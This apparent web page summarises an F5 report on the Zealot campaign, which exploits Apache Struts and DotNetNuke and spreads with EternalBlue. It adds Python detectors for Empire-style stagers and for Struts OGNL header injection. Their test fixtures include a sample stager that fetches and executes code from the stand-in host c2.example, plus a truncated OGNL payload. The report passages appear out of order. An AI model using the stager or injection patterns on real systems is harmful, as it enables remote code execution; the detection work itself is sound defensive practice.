
Little snitch linux

The attackers seem to be using the EmpireProject post-exploitation framework (see the section below), which generates a Python agent for both Linux and OS X. It doesn’t appear that the attackers are targeting Macs currently; the campaign currently delivers a crypto-miner as a Windows PE (MZ) executable and as a Linux ELF binary. The Little Snitch check is part of this Python agent: if the firewall process is not running, the agent sends a request to a C&C server to fetch another piece of Python code. At the time we conducted this research, we could not collect that additional Python code, as the server was down. When sending the request to the C&C, specific User-Agent and Cookie headers are added. The way this script communicates with the server is levels of sophistication beyond the common botnet herder, so it grabbed our attention.
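The behaviour described above (a "Little Snitch" process check, a staged fetch with hand-set User-Agent and Cookie headers, and execution of whatever comes back) is also what an incident responder would look for when triaging a recovered Python script. The following is an added example, not code from the F5 report or from the Zealot sample: a static triage heuristic run over two constructed scripts. The indicator patterns, the placeholder host name and the sample scripts are my own assumptions shaped by the description, not signatures extracted from the real agent.

```python
import re

# Indicators of an Empire-style staged Python agent as described in the report.
# These regexes are heuristics written for this example (assumption), not
# signatures taken from the Zealot script itself.
INDICATORS = {
    "little_snitch_check": re.compile(r"Little\\?\s*Snitch", re.IGNORECASE),
    "process_listing": re.compile(r"\bps\s+-ef\b|\bps\s+aux\b|\bpgrep\b"),
    "custom_user_agent": re.compile(r"add_header\(\s*['\"]User-Agent['\"]|['\"]User-Agent['\"]\s*:"),
    "custom_cookie": re.compile(r"add_header\(\s*['\"]Cookie['\"]|['\"]Cookie['\"]\s*:"),
    "remote_fetch": re.compile(r"urlopen\(|requests\.get\(|urllib2?\."),
    "exec_of_payload": re.compile(r"\bexec\s*\(|\beval\s*\("),
}


def stager_indicators(script_text: str) -> list:
    """Return the names of all indicators present in a Python script body."""
    return [name for name, rx in INDICATORS.items() if rx.search(script_text)]


def is_suspected_stager(script_text: str) -> bool:
    """Flag a script only on the defining combination, not on any single hit.

    A fetch whose result is executed is the core of a stager; one of the
    evasion/header tricks from the report must accompany it, so ordinary
    HTTP client code with a custom User-Agent is not flagged on its own.
    """
    hits = set(stager_indicators(script_text))
    return ({"remote_fetch", "exec_of_payload"} <= hits
            and bool(hits & {"little_snitch_check", "custom_user_agent", "custom_cookie"}))


# Constructed sample shaped like the described agent. It is not the Zealot
# script: the host name is a placeholder and the header values are dummies.
SUSPICIOUS_SAMPLE = '''
import re, subprocess, sys, urllib2
cmd = "ps -ef | grep Little\\ Snitch | grep -v grep"
out = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE).stdout.read()
if re.search("Little Snitch", out):
    sys.exit()
req = urllib2.Request("http://c2.example/stage")
req.add_header("User-Agent", "Mozilla/5.0 (placeholder)")
req.add_header("Cookie", "session=placeholder")
exec(urllib2.urlopen(req).read())
'''

# Constructed benign script: sets a custom User-Agent and fetches a URL,
# but never executes the response, so it must not be flagged.
BENIGN_SAMPLE = '''
import urllib.request
req = urllib.request.Request("https://example.org/health")
req.add_header("User-Agent", "healthcheck/1.0")
print(urllib.request.urlopen(req).status)
'''

if __name__ == "__main__":
    for label, text in (("suspicious", SUSPICIOUS_SAMPLE), ("benign", BENIGN_SAMPLE)):
        print(label, is_suspected_stager(text), stager_indicators(text))
```

Run it and the constructed agent lookalike is flagged with all six indicators, while the health-check script reports only `custom_user_agent` and `remote_fetch` and is not flagged. The point of requiring the combination rather than any one regex is that each indicator on its own is common in legitimate automation.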

The attack starts with the threat actor scanning the web and sending two HTTP requests. One of the requests is the notorious Apache Struts exploit via the Content-Type header. While most of the similar Apache Struts campaigns target either Windows or Linux platforms, Zealot is equipped with payloads for both.
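Because the exploit rides in a request header rather than in the body, it can be caught on the wire or in access-log captures by checking that header for expression syntax a media type never contains. The following is an added example, not code from the F5 report or from Zealot: a header-level check over two constructed requests. It goes slightly beyond the text by also inspecting Content-Disposition and Content-Length, which the same Jakarta Multipart Parser flaw exposed in the later S2-046 variant; the marker patterns, the size threshold and the sample requests are my own assumptions, and the attack value is a truncated, non-functional stand-in.

```python
import re

# OGNL expression syntax never appears in a legitimate Content-Type,
# Content-Disposition or Content-Length value. These markers are my own
# heuristics for this example (assumption), not signatures from the F5 report.
OGNL_MARKERS = (
    re.compile(r"[%$]\{"),                # expression opener
    re.compile(r"#_memberAccess", re.I),  # sandbox-bypass idiom
    re.compile(r"@java\.lang\.", re.I),   # static class access
    re.compile(r"\bognl\b", re.I),
)

# Headers the Jakarta Multipart Parser echoed into an OGNL-evaluated error
# message: Content-Type (S2-045, the bug the report names) plus
# Content-Disposition and Content-Length (S2-046 variant). Assumption: check all three.
PARSER_HEADERS = ("content-type", "content-disposition", "content-length")

# A plausible media type: type/subtype plus optional ";name=value" parameters.
MEDIA_TYPE = re.compile(r"^[\w!#$&^.+-]+/[\w!#$&^.+-]+(\s*;\s*[^;=]+=[^;]*)*$")


def parse_headers(raw_request: str) -> dict:
    """Return the headers of a raw HTTP/1.1 request as a lowercase-keyed dict."""
    head = raw_request.split("\r\n\r\n", 1)[0]
    headers = {}
    for line in head.split("\r\n")[1:]:  # skip the request line
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    return headers


def header_findings(name: str, value: str) -> list:
    """Reasons a single header value looks like an injection attempt."""
    reasons = [f"ognl marker {rx.pattern!r}" for rx in OGNL_MARKERS if rx.search(value)]
    if len(value) > 256:  # assumption: no legitimate parser header is this long
        reasons.append("oversized value")
    if name == "content-type" and not MEDIA_TYPE.match(value):
        reasons.append("not a media type")
    return reasons


def struts_findings(raw_request: str) -> dict:
    """Map each parser-relevant header to its findings; an empty dict means clean."""
    headers = parse_headers(raw_request)
    findings = {}
    for name in PARSER_HEADERS:
        if name in headers:
            reasons = header_findings(name, headers[name])
            if reasons:
                findings[name] = reasons
    return findings


def is_struts_multipart_attack(raw_request: str) -> bool:
    return bool(struts_findings(raw_request))


# Constructed requests for the check to run over. The attack header is a
# truncated, non-functional stand-in for the kind of OGNL payload described.
BENIGN_REQUEST = (
    "POST /upload.action HTTP/1.1\r\n"
    "Host: struts.example\r\n"
    "Content-Type: multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW\r\n"
    "Content-Length: 0\r\n"
    "\r\n"
)
ATTACK_REQUEST = (
    "POST /upload.action HTTP/1.1\r\n"
    "Host: struts.example\r\n"
    "Content-Type: %{(#_='multipart/form-data').(#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)}\r\n"
    "Content-Length: 0\r\n"
    "\r\n"
)

if __name__ == "__main__":
    for label, req in (("benign", BENIGN_REQUEST), ("attack", ATTACK_REQUEST)):
        print(label, is_struts_multipart_attack(req), struts_findings(req))
```

The benign multipart upload passes cleanly, while the stand-in attack request is reported on its Content-Type for the `%{` opener, the `#_memberAccess` idiom, the `ognl` token and for not being a media type at all. The media-type sanity check is what catches an obfuscated payload that avoids every literal marker.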


When F5’s threat researchers first discovered this new Apache Struts campaign, dubbed Zealot, it appeared to be one of the many campaigns already exploiting servers vulnerable to the Jakarta Multipart Parser attack (CVE-2017-5638), which have been widespread since the flaw was first discovered in March 2017. It also exploits the DotNetNuke (DNN) vulnerability (CVE-2017-9822), disclosed in July 2017. When looking more closely at the unusually heavily obfuscated payload, we discovered a much more sophisticated multi-staged attack, with lateral movement capabilities, leveraging the leaked NSA-attributed EternalBlue and EternalSynergy exploits. The Zealot campaign aggressively targets both Windows and Linux systems with the DNN and Struts exploits together. It is currently mining the cryptocurrency Monero; however, the attackers could use the compromised systems to do whatever they want.

Targeting Apache Struts Jakarta Multipart Parser (CVE-2017-5638)

  • New Apache Struts campaign, Zealot, targets Windows and Linux systems.
  • Zealot is a sophisticated, highly obfuscated and multi-staged attack.
  • Zealot collectively exploits servers vulnerable to:
      • CVE-2017-5638: Apache Struts Jakarta Multipart Parser attack.
      • CVE-2017-9822: DotNetNuke (DNN) content management system vulnerability.
  • The attack leverages the EternalBlue and EternalSynergy exploits for lateral movement inside networks.
  • It has a highly obfuscated PowerShell agent for Windows and a Python agent for Linux/OS X that seem to be based on the EmpireProject post-exploitation framework.
  • Zealot is currently mining Monero, a cryptocurrency increasing in popularity with cyber-criminals.


As we continue to research this campaign, we will update this publication.


F5 threat researchers have discovered a new Apache Struts campaign. This new campaign is a sophisticated multi-staged attack targeting internal networks with the NSA-attributed EternalBlue and EternalSynergy exploits. We have dubbed the campaign “Zealot” based on the name of the zip file containing the Python scripts with the NSA-attributed exploits.
